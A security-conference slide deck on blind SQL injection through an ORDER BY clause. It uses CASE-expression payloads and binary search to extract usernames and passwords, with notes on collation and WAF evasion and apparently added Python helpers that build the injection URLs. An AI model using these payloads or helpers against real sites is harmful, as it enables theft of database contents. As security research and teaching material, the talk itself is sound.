Efficient extraction of data using binary search and ordering information

Yusuf Motara
ZaCon 2009
http://www.zacon.org.za/Archives/2009/slides/

Published in: Technology
  1. 1.
     • "select * from customers order by " + injection + " asc"
     • Read-only exploitable? Not really…
       › Can’t UNION with anything else
       › Can’t add columns
     • We can tell or guess…
       › Number of columns
       › Column names
     • Even if we know the DB layout, we can’t get info out with ORDER BY
  2. 2.
     • CASE expressions allowed in ORDER BY
       › site.co.za/?o=case when 1=2 then ID else Address end
     • Which we can use to extract data!
       › CASE WHEN expr THEN value [ELSE value] END
     • There’s actually a second CASE syntax, too
       › expr can be a SQL statement
     • site.co.za/?o=case when (select top 1 substring(username,1,1) from users)='a' then ID else Address end
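A minimal sketch of how the probe on this slide could be assembled in Python. The table, column, and sort-column names come from the slide; the helper names and the `http://` scheme are assumptions made for illustration only.

```python
from urllib.parse import quote


def case_order_by(condition, if_true="ID", if_false="Address"):
    """Wrap a boolean SQL condition in a CASE expression usable as an ORDER BY key."""
    return f"case when {condition} then {if_true} else {if_false} end"


def char_probe(position, guess):
    """Condition: is character `position` (1-based) of the first username equal to `guess`?"""
    escaped = guess.replace("'", "''")  # double single quotes inside a SQL string literal
    return f"(select top 1 substring(username,{position},1) from users)='{escaped}'"


def probe_url(position, guess, base="http://site.co.za/?o="):
    """Hypothetical helper: URL-encode the payload and append it to the vulnerable parameter."""
    return base + quote(case_order_by(char_probe(position, guess)))


print(case_order_by(char_probe(1, "a")))
print(probe_url(1, "a"))
```

The page then comes back sorted by ID when the guess is right and by Address when it is wrong, which is the one bit of information each request yields.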
  3. 3.
     • Assuming all data items are lowercase
       › And assuming that we go in alphabetical order
     • Then:
       › 56 queries to return “john”
       › 65 queries to return “martin”
       › 119 queries to return “johenius”
     • Extend to uppercase+digits+special
       › “K1ngArthur!” would take a few hundred queries.
  4. 4.
     • Binary-search (courtesy Wikipedia)
       › BSearch(A[0..N-1], v, l, h):
           if (h < l) return -1  // not found
           m = l + ((h - l) / 2)
           if (A[m] > v) return BSearch(A, v, l, m-1)
           else if (A[m] < v) return BSearch(A, v, m+1, h)
           else return m  // found
     • site.co.za/?o=case when (select top 1 username from users) <= candidate then ID else Address end
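The same idea can be sketched in Python for the case where the only feedback is the answer to "is the hidden value <= candidate?". The `is_le` callback is a stand-in (an assumption) for issuing the request above and checking which column the page was sorted by; here it is simulated locally with a known value.

```python
def extract_int(is_le, low, high):
    """Find the hidden integer in [low, high] using only `hidden <= candidate` answers."""
    queries = 0
    while low < high:
        mid = low + (high - low) // 2
        queries += 1
        if is_le(mid):
            high = mid       # hidden value is at or below mid
        else:
            low = mid + 1    # hidden value is strictly above mid
    return low, queries


# Local simulation: the "server" knows `hidden`, the caller only sees True/False.
hidden = 1977
value, queries = extract_int(lambda candidate: hidden <= candidate, 0, 10_000)
print(value, queries)
```

Because each answer halves the remaining range, the number of requests grows with the logarithm of the range rather than with the range itself.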
  5. 5.
     • How do we find candidates? Strings aren’t numbers!
       › Create ordered alphabet
       › Create string↔number conversion funcs
     • Trivial, aside from big-numberness
     • What are our initial bounds?
       › Minimum is 0
       › Maximum can be found by binary-search on length
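One way to read this slide is to treat a string of known length as a number written in base len(alphabet). The sketch below assumes a lowercase-only alphabet and assumes the length has already been found by a separate search; the function names are illustrative. Python integers are arbitrary precision, which sidesteps the big-number issue.

```python
ALPHABET = "abcdefghijklmnopqrstuvwxyz"  # assumed ordered alphabet
BASE = len(ALPHABET)
INDEX = {ch: i for i, ch in enumerate(ALPHABET)}


def to_number(text):
    """Interpret `text` as a base-BASE number, most significant character first."""
    number = 0
    for ch in text:
        number = number * BASE + INDEX[ch]
    return number


def to_string(number, length):
    """Inverse of to_number for a fixed length, left-padded with the first letter."""
    chars = []
    for _ in range(length):
        number, digit = divmod(number, BASE)
        chars.append(ALPHABET[digit])
    return "".join(reversed(chars))


def extract_string(is_le, length):
    """Binary-search the numeric range [0, BASE**length - 1] with a `hidden <= candidate` oracle."""
    low, high = 0, BASE ** length - 1
    while low < high:
        mid = low + (high - low) // 2
        if is_le(to_string(mid, length)):
            high = mid
        else:
            low = mid + 1
    return to_string(low, length)


hidden = "martin"  # simulated secret; a real oracle would be an HTTP request
print(extract_string(lambda candidate: hidden <= candidate, len(hidden)))
```

For equal-length strings over an ordered alphabet, numeric order and lexicographic order agree, which is what lets the numeric midpoint serve as a string candidate.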
  6. 6.
     • How do we order our alphabet?
       › Initially, I thought to do it via built-in lexicographic comparison…
     • … which fails for certain cases due to SQL collation differences
       › Use ordering queries to initialize alphabet instead
     • This can take ~300 queries for a ~90-character alphabet.
     • Amortised over total number of queries
     • Or, make a guess and run against local server
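A rough sketch of ordering an alphabet when the only tool is a comparison answered by the database. The `is_le` oracle here is a local stand-in with a made-up case-insensitive rule, not SQL Server's actual collation, and binary insertion is just one possible strategy; the number of queries it needs is not claimed to match the figure on the slide.

```python
def order_alphabet(chars, is_le):
    """Sort `chars` using only an `a <= b` oracle, via binary insertion."""
    ordered = []
    for ch in chars:
        low, high = 0, len(ordered)
        while low < high:
            mid = (low + high) // 2
            if is_le(ch, ordered[mid]):   # one ordering query per comparison
                high = mid
            else:
                low = mid + 1
        ordered.insert(low, ch)
    return ordered


def toy_collation_le(a, b):
    """Assumed stand-in for the server: compare case-insensitively, uppercase first on ties."""
    return (a.lower(), a) <= (b.lower(), b)


print(order_alphabet("bBaA1", toy_collation_le))
```

The resulting list can then replace a hard-coded alphabet in the string↔number conversion, so candidates are generated in the order the server itself uses.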
  7. 7.
     • Comparisons done by SQL engine
       › Case-insensitive generally
       › COLLATION matters!
       › 'mooo' < 'moo''a', but 'mooo' > 'moo''z', according to SQL Server
       › Solution/workaround: compare as binary
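To illustrate why a binary comparison is easier to reason about, the sketch below compares the slide's strings byte by byte in Python. It makes no attempt to reproduce SQL Server's collation rules; it only shows the ordering that a plain byte-wise comparison gives.

```python
def binary_le(a, b):
    """Byte-wise `a <= b`, independent of any collation rules."""
    return a.encode("utf-8") <= b.encode("utf-8")


names = ["moo'z", "mooo", "moo'a"]
binary_order = sorted(names, key=lambda s: s.encode("utf-8"))
print(binary_order)

# The apostrophe (0x27) sorts below every letter, and uppercase sorts below lowercase.
print(binary_le("moo'z", "mooo"), binary_le("B", "a"))
```

With byte-wise comparison both apostrophe strings fall on the same side of 'mooo', so the search never sees the contradictory answers described on the slide.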
  8. 8.
     • Running into WAFs and other protections
       › “e[<zmo~~~~~~” is detected as an attack
     • So is “Lor,w&#$Jo..”
     • Go lower? Go higher? No way of knowing.
       › Workaround: remove “<” and “&” from alphabet.
     • Better ideas welcome!
     • Alphabet must be complete
       › Or you must be a better SQL ninja than I am :)
  9. 9.
     • How do we get to the next record?
       › Can’t use SELECT LIKE – we don’t know what the next record looks like
       › If DB supports RowID, and you can use it, use it
       › Otherwise…
     • "… where [targetCol] not in ('foo', 'bar', …)"
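A small sketch of the NOT IN approach: every value already extracted is added to an exclusion list so that `top 1` returns the next unseen record. The helper names are hypothetical, and the `select top 1 … from …` shape is borrowed from the earlier slides.

```python
def sql_literal(value):
    """Quote a string as a SQL literal, doubling embedded single quotes."""
    return "'" + value.replace("'", "''") + "'"


def exclusion_clause(column, seen):
    """Build the `where … not in (…)` clause for values already extracted."""
    if not seen:
        return ""
    return f" where {column} not in ({', '.join(sql_literal(v) for v in seen)})"


def next_record_query(column, table, seen):
    """Sub-select that returns the first record not yet extracted."""
    return f"select top 1 {column} from {table}{exclusion_clause(column, seen)}"


print(next_record_query("username", "users", []))
print(next_record_query("username", "users", ["john", "O'Neill"]))
```

The clause grows with every record recovered, which is why the payload size becomes a concern as extraction continues.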
  10. 10.
     • Binary search is O(log2(n)) at best, and O(log2(n)+1) at worst
       › However, a single iteration may cause two requests
     • How good is this news?
       › This is a lot of complexity! It’d better be worth it…
  11. 11. [Chart: Binary-search vs. Simple, logarithmic axis from 1 to 10000]
  12. 12. [Chart: Binary-search vs. Simple, linear axis from 0 to 3000]
  13. 13. [Chart: Speedup per test string, axis from 0.0x to 8.0x. Labels as extracted: john harry 1337hax0r GuessAgain zongo robert SarahJessicaParkedHere m0ronz O'Neill johnsmith sally p@ssw0rd7 VeryLongPassword,PrettyMuch Uncrackable drongo love1977 AndGotATicket ~R_Us!! Kern3l'O'Neill]
  14. 14.
     • 4x minimum speedup, 6x average speedup
       › The difference between waiting 6 minutes or 1 minute
     • Can be adapted trivially to extract integer, floating-point, GUID, etc.
       › Extremely good at approximating answer
     • Good way to exploit ORDER BY, which has traditionally been considered a difficult injection point
  15. 15.
     • Use only when necessary!
       › Relies on a 1-bit side-channel; smuggling data out this way is going to be slow.
     • Gets slower with each record
       › Amount of data sent increases
       › GET length limits you; POST is best
     • Wasteful due to ordering queries, unless:
       › More than 2 records are to be extracted
       › Collation is guessed, and local server used
  16. 16.
     • Many more optimisations possible
       › Better SQL
       › Adaptive SQL
     • Pattern-matched row exclusion
     • Adaptive querying once sufficient unique characters have been discovered
       › Fewer queries
     • Possible to use “<=” only, given that binary-search is best-case O(log2(n))
       › Collation tables instead of ordering queries
  17. 17.
     • Technique can be generalized to suit any data extraction area
       › Necessary: comparison operation result
       › XPath? Efficient GUID extraction? Dates?
     • Could be used as an n-bit channel
       › where n = number of ORDER BY clauses that return different results
     • Needs testing; ’tis merely a PoC.
       › I know there are some minor bugs…
  18. 18.
     • Will I continue with this? Probably not.
     • cinyc.s – AT – gmail.com
